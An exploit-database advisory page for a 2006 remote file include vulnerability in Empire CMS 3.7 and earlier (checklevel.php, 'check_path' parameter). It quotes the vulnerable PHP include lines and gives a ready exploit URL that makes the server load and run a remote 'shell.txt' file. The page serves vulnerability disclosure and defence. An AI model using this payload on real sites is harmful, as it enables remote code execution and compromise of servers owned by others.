Empire CMS - exploit.company

vendor:

Empire CMS

by:

Bob Linuson

7,5

CVSS

HIGH

Remote File Include

CWE

Product Name: Empire CMS

Affected Version From: 3.7 and prior

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Empire CMS <=3.7 (checklevel.php) Remote File Include Vulnerability

Empire CMS version 3.7 and prior is vulnerable to a remote file include vulnerability. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'check_path' parameter of the 'checklevel.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system. The attacker can supply a URL in the 'check_path' parameter to execute arbitrary PHP code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Empire CMS.

Source

Exploit-DB raw data:

    Empire CMS <=3.7 (checklevel.php) Remote File Include Vulnerability
           Find by: Bob Linuson

# Code:

2   $includefile=$check_path."e/class/MemberLevel.php";
3   include("$includefile");
.....
67  include($check_path."e/class/connect.php");
68  include($check_path."e/class/db_sql.php");
69  include($check_path."e/class/user.php");


#Exploit:

http://www.site.com/e/class/checklevel.php?check_path=http://shell.txt?


#URL:

http://www.phome.net/tmp/ecms37/
http://www.phome.net/tmp/ecms37/down.php?url=/tmp/ecms37/ecms3.7-free.rar&
english:
http://translate.google.com/translate?u=http%3A%2F%2Fwww.phome.net%2Ftmp%2Fecms37%2F&langpair=zh-CN%7Cen&hl=zh-CN&newwindow=1&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools

# milw0rm.com [2006-08-22]